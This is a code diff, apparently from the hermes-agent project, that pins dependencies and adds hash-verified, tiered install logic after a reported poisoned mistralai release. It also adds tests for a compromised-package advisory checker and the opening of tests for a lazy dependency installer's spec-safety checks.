+# mistral: extra REMOVED 2026-05-12 — `mistralai` PyPI project quarantined
+# after malicious 2.4.6 release (Mini Shai-Hulud worm). Every version of
+# `mistralai` returns 404 on PyPI right now, so any pin we'd write is
+# unresolvable, which breaks `uv lock --check` in CI.
+#
+# To restore once PyPI un-quarantines:
+#   1. Verify the new release is clean (read the changelog, check Socket
+#      advisory page, confirm no malicious code review findings).
+#   2. Add back: mistral = ["mistralai==<verified-version>"]
+#   3. Re-enable Mistral in:
+#        - tools/lazy_deps.py (LAZY_DEPS["tts.mistral"], LAZY_DEPS["stt.mistral"])
+#        - hermes_cli/tools_config.py (un-hide from provider picker)
+#        - hermes_cli/web_server.py (re-add to dashboard STT options)
+#        - tools/transcription_tools.py / tools/tts_tool.py (drop disabled stubs)
+#   4. Run `uv lock` to regenerate transitives.
+#   5. Optionally re-add to [all] only after a few days of clean operation.
+bedrock = ["boto3==1.42.89"]
 termux = [
   # Baseline Android / Termux path for reliable fresh installs.
-  "python-telegram-bot[webhooks]>=22.6,<23",
+  "python-telegram-bot[webhooks]==22.6",
   "hermes-agent[cron]",
   "hermes-agent[cli]",
   "hermes-agent[pty]",
@@ -120,35 +160,41 @@ termux-all = [
   "hermes-agent[sms]",
   "hermes-agent[web]",
 ]
-dingtalk = ["dingtalk-stream>=0.20,<1", "alibabacloud-dingtalk>=2.0.0", "qrcode>=7.0,<8"]
-feishu = ["lark-oapi>=1.5.3,<2", "qrcode>=7.0,<8"]
+dingtalk = ["dingtalk-stream==0.24.3", "alibabacloud-dingtalk==2.2.42", "qrcode==7.4.2"]
+feishu = ["lark-oapi==1.5.3", "qrcode==7.4.2"]
 google = [
   # Required by the google-workspace skill (Gmail, Calendar, Drive, Contacts,
   # Sheets, Docs).  Declared here so packagers (Nix, Homebrew) ship them with
   # the [all] extra and users don't hit runtime `pip install` paths that fail
   # in environments without pip (e.g. Nix-managed Python).
-  "google-api-python-client>=2.100,<3",
-  "google-auth-oauthlib>=1.0,<2",
-  "google-auth-httplib2>=0.2,<1",
+  "google-api-python-client==2.194.0",
+  "google-auth-oauthlib==1.3.1",
+  "google-auth-httplib2==0.3.1",
 ]
 youtube = [
   # Required by skills/media/youtube-content and
   # optional-skills/productivity/memento-flashcards (youtube_quiz.py).
   # Without this declaration uv sync omits the package and both skills fail
   # at first invocation with ModuleNotFoundError (issue #22243).
-  "youtube-transcript-api>=1.2.0",
+  "youtube-transcript-api==1.2.4",
 ]
 # `hermes dashboard` (localhost SPA + API).  Not in core to keep the default install lean.
-web = ["fastapi>=0.104.0,<1", "uvicorn[standard]>=0.24.0,<1"]
+web = ["fastapi==0.133.1", "uvicorn[standard]==0.41.0"]
 rl = [
   "atroposlib @ git+https://github.com/NousResearch/atropos.git@c20c85256e5a45ad31edf8b7276e9c5ee1995a30",
   "tinker @ git+https://github.com/thinking-machines-lab/tinker.git@30517b667f18a3dfb7ef33fb56cf686d5820ba2b",
-  "fastapi>=0.104.0,<1",
-  "uvicorn[standard]>=0.24.0,<1",
-  "wandb>=0.15.0,<1",
+  "fastapi==0.133.1",
+  "uvicorn[standard]==0.41.0",
+  "wandb==0.25.1",
 ]
 yc-bench = ["yc-bench @ git+https://github.com/collinear-ai/yc-bench.git@bfb0c88062450f46341bd9a5298903fc2e952a5c ; python_version >= '3.12'"]
 all = [
+  "hermes-agent[anthropic]",
+  "hermes-agent[exa]",
+  "hermes-agent[firecrawl]",
+  "hermes-agent[parallel-web]",
+  "hermes-agent[fal]",
+  "hermes-agent[edge-tts]",
   "hermes-agent[modal]",
   "hermes-agent[daytona]",
   "hermes-agent[vercel]",
diff --git a/scripts/install.ps1 b/scripts/install.ps1
index ed0f802a1c9..56a338ea069 100644
--- a/scripts/install.ps1
+++ b/scripts/install.ps1
@@ -793,30 +793,87 @@ function Install-Dependencies {
         # Tell uv to install into our venv (no activation needed)
         $env:VIRTUAL_ENV = "$InstallDir\venv"
     }
-    
+
+    # Hash-verified install (Tier 0) — when uv.lock is present, prefer
+    # `uv sync --locked`. The lockfile records SHA256 hashes for every
+    # transitive dependency, so a compromised transitive (different hash
+    # than what we shipped) is REJECTED by the resolver. This is the
+    # *only* path that protects against the "direct dep is fine, but the
+    # dep's dep got worm-poisoned overnight" failure mode. The
+    # `uv pip install` tiers below re-resolve transitives fresh from PyPI
+    # without any hash verification — they exist to keep installs working
+    # when the lockfile is stale, missing, or out-of-sync with the
+    # current extras spec, NOT because they're equivalent in posture.
+    if (Test-Path "uv.lock") {
+        Write-Info "Trying tier: hash-verified (uv.lock) ..."
+        & $UvCmd sync --all-extras --locked
+        if ($LASTEXITCODE -eq 0) {
+            Write-Success "Main package installed (hash-verified via uv.lock)"
+            $script:InstalledTier = "hash-verified (uv.lock)"
+            # Skip the rest of the tiered cascade — we already have a
+            # complete, hash-verified install.
+            $skipPipFallback = $true
+        } else {
+            Write-Warn "uv.lock sync failed (lockfile may be stale), falling back to PyPI resolve..."
+            $skipPipFallback = $false
+        }
+    } else {
+        Write-Info "uv.lock not found — falling back to PyPI resolve (no hash verification)"
+        $skipPipFallback = $false
+    }
+
     # Install main package.  Tiered fallback so a single flaky git+https dep
     # (atroposlib / tinker in the [rl] extra) doesn't silently drop
     # dashboard/MCP/cron/messaging extras.  Each tier's stdout/stderr is
     # preserved — no Out-Null swallowing — so the user can see what failed.
     #
     # Tier 1: [all] — everything, including RL git+https deps (best case).
-    # Tier 2: [core-extras] synthesised locally — all PyPI-only extras we
-    #         ship (web, mcp, cron, cli, voice, messaging, slack, dev, acp,
-    #         pty, homeassistant, sms, tts-premium, honcho, google, mistral,
-    #         bedrock, dingtalk, feishu, modal, daytona, vercel).  Drops [rl]
-    #         and [matrix] (linux-only) which are the usual failure culprits.
-    # Tier 3: [web,mcp,cron,cli,messaging,dev] — the minimum we strongly
+    # Tier 2: [all] minus a small list of currently-broken extras. The
+    #         broken list is centralised in $brokenExtras below — when
+    #         a package gets quarantined / yanked / pulled, add it here
+    #         and the resolver no longer chokes on it. This is what saves
+    #         the user from silently losing 10+ unrelated extras every
+    #         time one upstream package breaks.
+    # Tier 3: [core-extras] synthesised locally — all PyPI-only extras we
+    #         ship, also minus $brokenExtras. Drops [rl] and [matrix]
+    #         (linux-only) which are the usual failure culprits.
+    # Tier 4: [web,mcp,cron,cli,messaging,dev] — the minimum we strongly
     #         believe a user expects `hermes dashboard` / slash commands /
     #         cron / messaging platforms to work out of the box.
-    # Tier 4: bare `.` — last-resort so at least the core CLI launches.
+    # Tier 5: bare `.` — last-resort so at least the core CLI launches.
+
+    # Currently-broken extras. Edit this list when an upstream package
+    # gets quarantined / yanked / breaks resolution. Empty means everything
+    # in [all] should be installable; populate with the names of extras
+    # whose deps are temporarily unavailable to keep installs working
+    # for users.
+    $brokenExtras = @()
+
+    $allExtras = @(
+        "modal","daytona","vercel","messaging","matrix","cron","cli","dev",
+        "tts-premium","slack","pty","honcho","mcp","homeassistant","sms",
+        "acp","voice","dingtalk","feishu","google","bedrock","web",
+        "youtube"
+    )
+    $pypiExtras = @(
+        "web","mcp","cron","cli","voice","messaging","slack","dev","acp",
+        "pty","homeassistant","sms","tts-premium","honcho","google",
+        "bedrock","dingtalk","feishu","modal","daytona","vercel","youtube"
+    )
+    $safeAll  = ($allExtras  | Where-Object { $brokenExtras -notcontains $_ }) -join ","
+    $safePypi = ($pypiExtras | Where-Object { $brokenExtras -notcontains $_ }) -join ","
+    $brokenLabel = if ($brokenExtras) { ($brokenExtras -join ", ") } else { "none" }
+
     $installTiers = @(
         @{ Name = "all (with RL/matrix extras)"; Spec = ".[all]" },
-        @{ Name = "PyPI-only extras (no git deps)"; Spec = ".[web,mcp,cron,cli,voice,messaging,slack,dev,acp,pty,homeassistant,sms,tts-premium,honcho,google,mistral,bedrock,dingtalk,feishu,modal,daytona,vercel]" },
+        @{ Name = "all minus known-broken ($brokenLabel)"; Spec = ".[$safeAll]" },
+        @{ Name = "PyPI-only extras (no git deps)"; Spec = ".[$safePypi]" },
         @{ Name = "dashboard + core platforms"; Spec = ".[web,mcp,cron,cli,messaging,dev]" },
         @{ Name = "core only (no extras)"; Spec = "." }
     )
-    $installed = $false
-    foreach ($tier in $installTiers) {
+    $installed = $skipPipFallback
+    if (-not $skipPipFallback) {
+        foreach ($tier in $installTiers) {
         Write-Info "Trying tier: $($tier.Name) ..."
         & $UvCmd pip install -e $tier.Spec
         if ($LASTEXITCODE -eq 0) {
@@ -826,6 +883,7 @@ function Install-Dependencies {
             break
         }
         Write-Warn "Tier '$($tier.Name)' failed (exit $LASTEXITCODE). Trying next tier..."
+        }
     }
     if (-not $installed) {
         throw "Failed to install hermes-agent package even with no extras. Inspect the uv pip install output above."
diff --git a/scripts/install.sh b/scripts/install.sh
index bc391eee43c..f4fccea7d9e 100755
--- a/scripts/install.sh
+++ b/scripts/install.sh
@@ -1060,20 +1060,124 @@ install_deps() {
     fi
 
     # Install the main package in editable mode with all extras.
-    # Try [all] first, fall back to base install if extras have issues.
-    ALL_INSTALL_LOG=$(mktemp)
-    if ! $UV_CMD pip install -e ".[all]" 2>"$ALL_INSTALL_LOG"; then
-        log_warn "Full install (.[all]) failed, trying base install..."
-        log_info "Reason: $(tail -5 "$ALL_INSTALL_LOG" | head -3)"
-        rm -f "$ALL_INSTALL_LOG"
-        if ! $UV_CMD pip install -e "."; then
-            log_error "Package installation failed."
-            log_info "Check that build tools are installed: sudo apt install build-essential python3-dev"
-            log_info "Then re-run: cd $INSTALL_DIR && uv pip install -e '.[all]'"
-            exit 1
+    #
+    # Hash-verified install (Tier 0) — when uv.lock is present, prefer
+    # `uv sync --locked`. The lockfile records SHA256 hashes for every
+    # transitive, so a compromised transitive (different hash than what
+    # we shipped) is REJECTED by the resolver. This is the *only* path
+    # that protects against the "direct dep is fine, but the dep's dep
+    # got worm-poisoned overnight" failure mode. All `uv pip install`
+    # tiers below re-resolve transitives fresh from PyPI without any
+    # hash verification — they exist to keep installs working when the
+    # lockfile is stale, missing, or out-of-sync with the current
+    # extras spec, NOT because they're equivalent in posture.
+    if [ -f "uv.lock" ]; then
+        log_info "Trying tier: hash-verified (uv.lock) ..."
+        if UV_PROJECT_ENVIRONMENT="$INSTALL_DIR/venv" $UV_CMD sync --all-extras --locked 2>"$(mktemp)"; then
+            log_success "Main package installed (hash-verified via uv.lock)"
+            log_success "All dependencies installed"
+            return 0
         fi
+        log_warn "uv.lock sync failed (lockfile may be stale), falling back to PyPI resolve..."
     else
-        rm -f "$ALL_INSTALL_LOG"
+        log_info "uv.lock not found — falling back to PyPI resolve (no hash verification)"
+    fi
+
+    # Multi-tier fallback. The point of the tiers is that ONE compromised
+    # PyPI package (a worm-poisoned release that gets quarantined, like
+    # mistralai 2.4.6 in May 2026) shouldn't be able to silently demote a
+    # fresh install all the way down to "core only" — the user should keep
+    # everything else they signed up for.
+    #
+    # Tier 1: [all] — everything, including RL git+https deps (best case).
+    # Tier 2: [all] minus the currently-broken extras list. Edit
+    #         _BROKEN_EXTRAS below when something on PyPI breaks; this lets
+    #         users keep voice/honcho/google/slack/matrix/etc. even when
+    #         one transitive is unavailable. List the extras here as bare
+    #         names from pyproject.toml [project.optional-dependencies] —
+    #         the script translates them to `[a,b,c]` form below.
+    # Tier 3: PyPI-only extras (no git deps) — drops [rl] / [yc-bench]
+    #         which are git+https and may fail in restricted networks.
+    # Tier 4: dashboard + core platforms — minimum viable interactive set.
+    # Tier 5: bare `.` — last-resort so at least the core CLI launches.
+    #
+    # Each tier's stderr is captured to a tempfile so we can show the user
+    # WHY the higher tier failed instead of silently dropping support.
+    local _BROKEN_EXTRAS=()  # populate when an extra becomes unresolvable
+    local _ALL_EXTRAS=(
+        modal daytona vercel messaging matrix cron cli dev tts-premium slack
+        pty honcho mcp homeassistant sms acp voice dingtalk feishu google
+        bedrock web youtube
+    )
+    # Tier 2: all extras minus _BROKEN_EXTRAS
+    local _SAFE_EXTRAS=()
+    local _e _b _skip
+    for _e in "${_ALL_EXTRAS[@]}"; do
+        _skip=false
+        for _b in "${_BROKEN_EXTRAS[@]}"; do
+            if [ "$_e" = "$_b" ]; then _skip=true; break; fi
+        done
+        if [ "$_skip" = false ]; then _SAFE_EXTRAS+=("$_e"); fi
+    done
+    local _SAFE_SPEC
+    _SAFE_SPEC=".[$(IFS=,; echo "${_SAFE_EXTRAS[*]}")]"
+    # Tier 3: PyPI-only extras (no git deps), still skipping broken ones.
+    # Mirrors the install.ps1 list but excludes [rl] / [yc-bench] / [matrix]
+    # (matrix needs python-olm which fails to build on some hosts).
+    local _PYPI_EXTRAS=(
+        web mcp cron cli voice messaging slack dev acp pty homeassistant sms
+        tts-premium honcho google bedrock dingtalk feishu modal daytona vercel
+        youtube
+    )
+    local _PYPI_SAFE=()
+    for _e in "${_PYPI_EXTRAS[@]}"; do
+        _skip=false
+        for _b in "${_BROKEN_EXTRAS[@]}"; do
+            if [ "$_e" = "$_b" ]; then _skip=true; break; fi
+        done
+        if [ "$_skip" = false ]; then _PYPI_SAFE+=("$_e"); fi
+    done
+    local _PYPI_SPEC
+    _PYPI_SPEC=".[$(IFS=,; echo "${_PYPI_SAFE[*]}")]"
+    local _TIER4_SPEC=".[web,mcp,cron,cli,messaging,dev]"
+
+    ALL_INSTALL_LOG=$(mktemp)
+    local _installed=false
+    local _tier_name=""
+
+    install_tier() {
+        local name="$1"; local spec="$2"
+        log_info "Trying tier: $name ..."
+        if $UV_CMD pip install -e "$spec" 2>"$ALL_INSTALL_LOG"; then
+            log_success "Main package installed ($name)"
+            _installed=true
+            _tier_name="$name"
+            return 0
+        fi
+        log_warn "Tier '$name' failed. Top of pip output:"
+        head -5 "$ALL_INSTALL_LOG" | sed 's/^/    /' >&2
+        return 1
+    }
+
+    install_tier "all (with RL/matrix extras)" ".[all]" \
+        || install_tier "all minus known-broken (${_BROKEN_EXTRAS[*]:-none})" "$_SAFE_SPEC" \
+        || install_tier "PyPI-only extras (no git deps)" "$_PYPI_SPEC" \
+        || install_tier "dashboard + core platforms" "$_TIER4_SPEC" \
+        || install_tier "core only (no extras)" "."
+
+    rm -f "$ALL_INSTALL_LOG"
+
+    if [ "$_installed" = false ]; then
+        log_error "Package installation failed even with no extras."
+        log_info "Check that build tools are installed: sudo apt install build-essential python3-dev"
+        log_info "Then re-run: cd $INSTALL_DIR && uv pip install -e '.[all]'"
+        exit 1
+    fi
+
+    if [ "$_tier_name" != "all (with RL/matrix extras)" ]; then
+        log_warn "Note: installed via fallback tier ($_tier_name)."
+        log_info "Some optional features may be missing. After resolving any"
+        log_info "PyPI/network issue, re-run: $UV_CMD pip install -e '.[all]'"
     fi
 
     log_success "Main package installed"
diff --git a/setup-hermes.sh b/setup-hermes.sh
index 4d83f94ffb8..9690d6a23a6 100755
--- a/setup-hermes.sh
+++ b/setup-hermes.sh
@@ -183,17 +183,57 @@ if is_termux; then
 else
     # Prefer uv sync with lockfile (hash-verified installs) when available,
     # fall back to pip install for compatibility or when lockfile is stale.
+    #
+    # Multi-tier pip fallback. Goal: ONE compromised PyPI package
+    # (mistralai 2.4.6 in May 2026 → quarantined) shouldn't silently demote
+    # a fresh setup to "core only". Edit _BROKEN_EXTRAS when a transitive
+    # breaks; users keep voice / honcho / google / slack / matrix etc. even
+    # if mistral can't resolve.
+    _BROKEN_EXTRAS=()  # populate when an extra becomes unresolvable
+    _ALL_EXTRAS=(
+        modal daytona vercel messaging matrix cron cli dev tts-premium slack
+        pty honcho mcp homeassistant sms acp voice dingtalk feishu google
+        bedrock web youtube
+    )
+    _SAFE_EXTRAS=()
+    for _e in "${_ALL_EXTRAS[@]}"; do
+        _skip=false
+        for _b in "${_BROKEN_EXTRAS[@]}"; do
+            [ "$_e" = "$_b" ] && _skip=true && break
+        done
+        [ "$_skip" = false ] && _SAFE_EXTRAS+=("$_e")
+    done
+    _SAFE_SPEC=".[$(IFS=,; echo "${_SAFE_EXTRAS[*]}")]"
+    _try_install() {
+        $UV_CMD pip install -e ".[all]" \
+            || $UV_CMD pip install -e "$_SAFE_SPEC" \
+            || $UV_CMD pip install -e "."
+    }
+
     if [ -f "uv.lock" ]; then
+        # Hash-verified install (preferred). The lockfile records SHA256
+        # hashes for every transitive — a compromised transitive would have
+        # a different hash and be REJECTED by uv. This is the only path
+        # that protects against transitive-package supply-chain attacks
+        # (the direct deps in pyproject.toml are exact-pinned, but
+        # `uv pip install` re-resolves transitives fresh from PyPI).
         echo -e "${CYAN}→${NC} Using uv.lock for hash-verified installation..."
-        UV_PROJECT_ENVIRONMENT="$SCRIPT_DIR/venv" $UV_CMD sync --all-extras --locked 2>/dev/null && \
-            echo -e "${GREEN}✓${NC} Dependencies installed (lockfile verified)" || {
-            echo -e "${YELLOW}⚠${NC} Lockfile install failed (may be outdated), falling back to pip install..."
-            $UV_CMD pip install -e ".[all]" || $UV_CMD pip install -e "."
-            echo -e "${GREEN}✓${NC} Dependencies installed"
-        }
+        _UV_SYNC_LOG=$(mktemp)
+        if UV_PROJECT_ENVIRONMENT="$SCRIPT_DIR/venv" $UV_CMD sync --all-extras --locked 2>"$_UV_SYNC_LOG"; then
+            echo -e "${GREEN}✓${NC} Dependencies installed (hash-verified via uv.lock)"
+            rm -f "$_UV_SYNC_LOG"
+        else
+            echo -e "${YELLOW}⚠${NC} Lockfile sync failed (lockfile may be stale)."
+            echo -e "${YELLOW}⚠${NC} Falling back to PyPI resolve — transitives will NOT be hash-verified."
+            head -5 "$_UV_SYNC_LOG" | sed 's/^/    /'
+            rm -f "$_UV_SYNC_LOG"
+            _try_install
+            echo -e "${GREEN}✓${NC} Dependencies installed (transitives re-resolved, not hash-verified)"
+        fi
     else
-        $UV_CMD pip install -e ".[all]" || $UV_CMD pip install -e "."
-        echo -e "${GREEN}✓${NC} Dependencies installed"
+        echo -e "${YELLOW}⚠${NC} uv.lock not found — installing without hash verification of transitives."
+        _try_install
+        echo -e "${GREEN}✓${NC} Dependencies installed (transitives re-resolved, not hash-verified)"
     fi
 fi
 
diff --git a/tests/hermes_cli/test_security_advisories.py b/tests/hermes_cli/test_security_advisories.py
new file mode 100644
index 00000000000..0a745269a5e
--- /dev/null
+++ b/tests/hermes_cli/test_security_advisories.py
@@ -0,0 +1,330 @@
+"""Tests for hermes_cli.security_advisories.
+
+The advisory module is the user-facing detection / remediation surface
+for supply-chain attacks (e.g. the Mini Shai-Hulud worm of May 2026 that
+poisoned mistralai 2.4.6 on PyPI). These tests exercise the public API in
+isolation — no real package metadata, no real config, no real cache.
+"""
+
+from __future__ import annotations
+
+import time
+from pathlib import Path
+from typing import Iterator
+
+import pytest
+
+import hermes_cli.security_advisories as adv
+
+
+# ---------------------------------------------------------------------------
+# Fixtures
+# ---------------------------------------------------------------------------
+
+
+@pytest.fixture
+def fake_advisory() -> adv.Advisory:
+    """A self-contained Advisory used across tests."""
+    return adv.Advisory(
+        id="test-advisory-2026-99",
+        title="Test advisory",
+        summary="Pretend this package has been compromised.",
+        url="https://example.com/advisory",
+        compromised=(
+            ("fake-malicious-pkg", frozenset({"6.6.6"})),
+        ),
+        remediation=(
+            "pip uninstall -y fake-malicious-pkg",
+            "Rotate any credentials that may have been exposed.",
+        ),
+        published="2026-01-01",
+        severity="critical",
+    )
+
+
+@pytest.fixture
+def isolated_home(tmp_path: Path, monkeypatch: pytest.MonkeyPatch) -> Path:
+    """Redirect HERMES_HOME so banner cache and config writes are sandboxed."""
+    home = tmp_path / ".hermes"
+    home.mkdir()
+    (home / "cache").mkdir()
+    monkeypatch.setattr(Path, "home", lambda: tmp_path)
+    monkeypatch.setenv("HERMES_HOME", str(home))
+    return home
+
+
+@pytest.fixture
+def patched_version(monkeypatch: pytest.MonkeyPatch) -> Iterator[dict[str, str]]:
+    """Override _installed_version with a controllable lookup table."""
+    table: dict[str, str] = {}
+    monkeypatch.setattr(adv, "_installed_version", lambda pkg: table.get(pkg))
+    yield table
+
+
+# ---------------------------------------------------------------------------
+# detect_compromised
+# ---------------------------------------------------------------------------
+
+
+class TestDetectCompromised:
+    def test_no_match_returns_empty_list(self, fake_advisory, patched_version):
+        # No matching package installed.
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert hits == []
+
+    def test_exact_version_match(self, fake_advisory, patched_version):
+        patched_version["fake-malicious-pkg"] = "6.6.6"
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert len(hits) == 1
+        assert hits[0].advisory.id == fake_advisory.id
+        assert hits[0].package == "fake-malicious-pkg"
+        assert hits[0].installed_version == "6.6.6"
+
+    def test_safe_version_does_not_match(self, fake_advisory, patched_version):
+        # Package is installed but the version is not in the compromised set.
+        patched_version["fake-malicious-pkg"] = "6.6.5"
+        hits = adv.detect_compromised(advisories=[fake_advisory])
+        assert hits == []
+
+    def test_empty_compromised_set_matches_any_version(
+        self, patched_version
+    ):
+        # An advisory with an empty version set is a "any version is suspect"
+        # wildcard — used when an entire maintainer namespace is owned.
+        wildcard = adv.Advisory(
+            id="wildcard",
+            title="Whole namespace owned",
+            summary="x",
+            url="x",
+            compromised=(("evil-namespace", frozenset()),),
+            remediation=("uninstall it",),
+        )
+        patched_version["evil-namespace"] = "0.0.1"
+        hits = adv.detect_compromised(advisories=[wildcard])
+        assert len(hits) == 1
+        assert hits[0].installed_version == "0.0.1"
+
+
+# ---------------------------------------------------------------------------
+# Acknowledgement persistence
+# ---------------------------------------------------------------------------
+
+
+class TestAck:
+    def test_get_acked_ids_empty_when_no_config(self, monkeypatch):
+        # load_config raises → returns empty set, doesn't crash.
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config",
+            lambda: (_ for _ in ()).throw(RuntimeError("boom")),
+        )
+        assert adv.get_acked_ids() == set()
+
+    def test_filter_unacked_strips_dismissed(self, fake_advisory, monkeypatch):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: {fake_advisory.id})
+        assert adv.filter_unacked([hit]) == []
+
+    def test_filter_unacked_passes_through_unknown(
+        self, fake_advisory, monkeypatch
+    ):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        assert adv.filter_unacked([hit]) == [hit]
+
+    def test_ack_advisory_persists_id(self, isolated_home, monkeypatch):
+        # Stub the config layer end-to-end with a tiny in-memory store so we
+        # don't depend on the full hermes_cli.config bootstrap.
+        store: dict = {"security": {}}
+        monkeypatch.setattr(
+            "hermes_cli.config.load_config", lambda: store
+        )
+        monkeypatch.setattr(
+            "hermes_cli.config.save_config",
+            lambda cfg: store.update(cfg) or None,
+        )
+        assert adv.ack_advisory("test-advisory-2026-99") is True
+        assert "test-advisory-2026-99" in store["security"]["acked_advisories"]
+        # Idempotent.
+        adv.ack_advisory("test-advisory-2026-99")
+        assert (
+            store["security"]["acked_advisories"].count("test-advisory-2026-99")
+            == 1
+        )
+
+    def test_ack_advisory_rejects_blank(self, isolated_home):
+        assert adv.ack_advisory("") is False
+        assert adv.ack_advisory("   ") is False
+
+
+# ---------------------------------------------------------------------------
+# Banner cache rate limiting
+# ---------------------------------------------------------------------------
+
+
+class TestBannerCache:
+    def test_first_call_returns_due_hits(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        due = adv.hits_due_for_banner([hit])
+        assert due == [hit]
+
+    def test_second_call_within_window_suppresses(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        adv.hits_due_for_banner([hit])
+        # Same banner inside repeat window → suppressed.
+        again = adv.hits_due_for_banner([hit])
+        assert again == []
+
+    def test_call_after_window_re_banners(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        adv.hits_due_for_banner([hit])
+        # Backdate the cache so it looks like the banner was shown more
+        # than 24h ago — should re-banner.
+        cache_path = adv._banner_cache_path()
+        assert cache_path is not None
+        old_lines = cache_path.read_text(encoding="utf-8").splitlines()
+        backdated = []
+        for line in old_lines:
+            parts = line.split(None, 1)
+            if len(parts) == 2:
+                backdated.append(f"{parts[0]} {time.time() - 48 * 3600}")
+        cache_path.write_text("\n".join(backdated) + "\n", encoding="utf-8")
+        again = adv.hits_due_for_banner([hit])
+        assert again == [hit]
+
+    def test_acked_hits_never_banner(
+        self, fake_advisory, isolated_home, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: {fake_advisory.id})
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        assert adv.hits_due_for_banner([hit]) == []
+
+
+# ---------------------------------------------------------------------------
+# Rendering
+# ---------------------------------------------------------------------------
+
+
+class TestRendering:
+    def test_short_banner_lines_includes_id_and_version(self, fake_advisory):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        lines = adv.short_banner_lines([hit])
+        joined = "\n".join(lines)
+        assert fake_advisory.id in joined
+        assert fake_advisory.title in joined
+        assert "fake-malicious-pkg==6.6.6" in joined
+        assert "hermes doctor" in joined
+
+    def test_full_remediation_text_contains_all_steps(self, fake_advisory):
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        body = "\n".join(adv.full_remediation_text(hit))
+        # All remediation steps must be present.
+        for step in fake_advisory.remediation:
+            assert step in body
+        assert fake_advisory.url in body
+        assert fake_advisory.summary in body
+
+    def test_render_doctor_section_clean_state(self):
+        # No hits → success message, has_problems=False.
+        has_problems, lines = adv.render_doctor_section([])
+        assert has_problems is False
+        assert any("No active security advisories" in line for line in lines)
+
+    def test_render_doctor_section_with_unacked_hit(
+        self, fake_advisory, monkeypatch
+    ):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        has_problems, lines = adv.render_doctor_section([hit])
+        assert has_problems is True
+        body = "\n".join(lines)
+        assert fake_advisory.title in body
+
+    def test_gateway_log_message_singular(self, fake_advisory, monkeypatch):
+        monkeypatch.setattr(adv, "get_acked_ids", lambda: set())
+        hit = adv.AdvisoryHit(
+            advisory=fake_advisory,
+            package="fake-malicious-pkg",
+            installed_version="6.6.6",
+        )
+        msg = adv.gateway_log_message([hit])
+        assert msg is not None
+        assert fake_advisory.id in msg
+        assert "fake-malicious-pkg==6.6.6" in msg
+
+    def test_gateway_log_message_returns_none_for_no_hits(self):
+        assert adv.gateway_log_message([]) is None
+
+
+# ---------------------------------------------------------------------------
+# Real catalog smoke test
+# ---------------------------------------------------------------------------
+
+
+class TestRealCatalog:
+    def test_advisories_well_formed(self):
+        """Every shipped advisory must be self-consistent.
+
+        Catches data-entry mistakes (empty IDs, missing remediation, bad
+        compromised tuples) before they ship.
+        """
+        seen_ids: set[str] = set()
+        for advisory in adv.ADVISORIES:
+            assert advisory.id, "advisory has empty id"
+            assert advisory.id not in seen_ids, f"duplicate id {advisory.id}"
+            seen_ids.add(advisory.id)
+            assert advisory.title, f"{advisory.id}: empty title"
+            assert advisory.summary, f"{advisory.id}: empty summary"
+            assert advisory.remediation, f"{advisory.id}: empty remediation"
+            assert advisory.url.startswith("http"), \
+                f"{advisory.id}: bad url {advisory.url!r}"
+            assert advisory.compromised, \
+                f"{advisory.id}: empty compromised tuple"
+            for pkg, versions in advisory.compromised:
+                assert pkg, f"{advisory.id}: empty package name"
+                assert isinstance(versions, frozenset), \
+                    f"{advisory.id}: versions must be frozenset"
diff --git a/tests/tools/test_lazy_deps.py b/tests/tools/test_lazy_deps.py
new file mode 100644
index 00000000000..9beecc0d995
--- /dev/null
+++ b/tests/tools/test_lazy_deps.py
@@ -0,0 +1,228 @@
+"""Tests for tools.lazy_deps — the supply-chain-resilient on-demand installer.
+
+The lazy_deps module is the architectural fix for the "one quarantined
+package nukes 10 unrelated extras" problem. It exposes ``ensure(feature)``
+which only installs from a strict allowlist, refuses anything that looks
+like a URL / file path, runs venv-scoped, and respects the
+``security.allow_lazy_installs`` config flag.
+
+These tests cover the security boundary and the public API. The real pip
+call is mocked — we never actually shell out during unit tests.
+"""
+
+from __future__ import annotations
+
+from typing import Iterator
+
+import pytest
+
+import tools.lazy_deps as ld
+
+
+# ---------------------------------------------------------------------------
+# Spec safety
+# ---------------------------------------------------------------------------
+
+
+class TestSpecSafety:
+    @pytest.mark.parametrize("spec", [
+        "mistralai>=2.3.0,<3",
+        "elevenlabs>=1.0,<2",
+        "honcho-ai>=2.0.1,<3",
+        "boto3>=1.35.0,<2",
+        "mautrix[encryption]>=0.20,<1",
+        "google-api-python-client>=2.100,<3",
+        "youtube-transcript-api>=1.2.0",
+        "qrcode>=7.0,<8",
+        "package",  # bare name, no version
+        "package==1.0.0",
+        "package~=1.0",
+    ])
+    def test_safe_specs_pass(self, spec):
+        assert ld._spec_is_safe(spec), f"expected {spec!r} to be safe"
+
+    @pytest.mark.parametrize("spec", [
+        # URL-shaped → rejected (no remote origin override allowed)
